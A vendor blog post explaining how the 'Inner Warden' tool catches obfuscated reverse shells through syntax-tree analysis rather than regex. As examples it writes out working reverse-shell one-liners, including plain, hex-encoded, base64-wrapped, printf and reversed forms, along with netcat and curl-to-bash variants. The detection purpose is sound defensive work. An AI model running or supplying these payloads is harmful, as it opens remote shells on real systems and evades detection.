Threat Detection

How Inner Warden Catches Obfuscated Reverse Shells (Tree-Sitter AST, Not Regex)

Name: Inner Warden
Author: Inner Warden

March 29, 202610 min read

A reverse shell is the first thing an attacker establishes after gaining initial access. It connects your server back to the attacker's machine, giving them an interactive terminal. The problem: modern payloads are heavily obfuscated. They use hex encoding, base64 wrapping, printf substitution, and variable indirection to bypass every regex-based detection tool on the market.

Inner Warden does not use regex for command analysis. It parses commands into an Abstract Syntax Tree using tree-sitter and analyzes the structure, not the text. This catches obfuscated payloads that no pattern-matching tool can detect.

Why regex fails for reverse shell detection

A naive reverse shell looks like this:

Plain reverse shell

bash -i >& /dev/tcp/10.0.0.1/4444 0>&1

A regex can catch that. But attackers never send that. They send this:

Hex-encoded payload

echo -e '\x62\x61\x73\x68\x20\x2d\x69' | bash

Base64-wrapped payload

echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80NDQ0IDA+JjE= | base64 -d | bash

Printf substitution

$(printf '%s' 'bash' '-i' '>& /dev/tcp/10.0.0.1/4444')

Reversed string

echo '1>&0 4444/1.0.0.01/pct/ved/ &>i- hsab' | rev | bash

The string /dev/tcp never appears in the raw command. Neither does bash -i. Regex has nothing to match against. fail2ban, OSSEC, and most SIEM rules are blind to these payloads.

How tree-sitter AST analysis works

Instead of matching text, Inner Warden parses the command into a syntax tree using tree-sitter. The tree represents the structure of the command: pipes, redirections, subshells, command substitutions, and string operations. The analysis walks the tree looking for structural patterns, not string patterns.

For the hex-encoded example above, the AST reveals:

Node typepipeline

Left sideecho with hex escape sequences (\x62\x61...)

Right sidebash (shell interpreter)

Pattern matchEncoded data piped into interpreter = reverse shell

The key insight: regardless of how the payload is encoded, the AST structure always contains a pipeline where encoded or obfuscated data flows into a shell interpreter. Tree-sitter sees the structure. Regex sees the text.

Patterns Inner Warden detects

The check-command analysis engine covers these reverse shell families and obfuscation techniques:

Pattern	Example	AST signal
Python socket	`python -c 'import socket...'`	socket.socket + connect + subprocess
Perl socket	`perl -e 'use Socket...'`	use Socket + open + exec
mkfifo pipe	`mkfifo /tmp/f; cat /tmp/f \| bash`	mkfifo + pipe into interpreter
Bash hex escapes	`$'\x62\x61\x73\x68'`	ANSI-C quoting with hex sequences
eval + base64	`eval $(echo ... \| base64 -d)`	eval wrapping decoded substitution
printf build	`$(printf '\x2f\x64\x65\x76...')`	printf with hex in command substitution
rev pipe	`echo '...' \| rev \| bash`	string reversal piped into interpreter
Download + execute	`curl http://x.x/s \| bash`	network fetch piped into interpreter
Netcat variants	`nc -e /bin/sh 10.0.0.1 4444`	nc/ncat with -e flag + interpreter path

The check-command API

Inner Warden exposes a POST /api/agent/check-command endpoint that analyzes any command without executing it. This is designed for AI agents (OpenClaw, n8n, custom automation) that need to validate commands before running them.

Check an obfuscated reverse shell

curl -s http://localhost:9111/api/agent/check-command \
  -H "Content-Type: application/json" \
  -d '{"command": "echo YmFzaCAtaSA+Ji... | base64 -d | bash"}'

Response

{
  "safe": false,
  "risk": "critical",
  "reasons": [
    "base64 decode piped into shell interpreter (reverse shell pattern)",
    "encoded payload obscures true intent"
  ],
  "categories": ["reverse_shell", "obfuscation"]
}

A clean command returns "safe": true with no reasons. The analysis runs in under 5ms because tree-sitter parsing is compiled to native Rust. No network calls, no AI inference.

Comparison with regex-based tools

Tools like fail2ban, OSSEC, and most SIEM rules rely on regex patterns to detect malicious commands. This works for known, unobfuscated payloads. It fails for everything else.

Capability	Regex tools	Inner Warden (AST)
Plain reverse shells	Detected	Detected
Base64-encoded payloads	Missed	Detected
Hex-escaped strings	Missed	Detected
printf/rev obfuscation	Missed	Detected
Variable indirection	Missed	Detected
Pre-execution analysis	No	Yes (API)
Latency	~1ms	<5ms

Set it up

The check-command endpoint is available on the agent dashboard. Install Inner Warden and the API is ready:

Install

curl -fsSL https://www.innerwarden.com/install | sudo bash

The exec_audit collector watches for suspicious commands in real time. The check-command API lets external tools validate commands before execution. Both use the same tree-sitter engine.

What to do next

Protect AI agents on your server - use the check-command API to validate every command your AI agent wants to run.
SSH honeypot setup - capture the reverse shell payloads attackers try to run on your server.
View on GitHub - the check-command engine is open source. Read the implementation, report false positives, contribute patterns.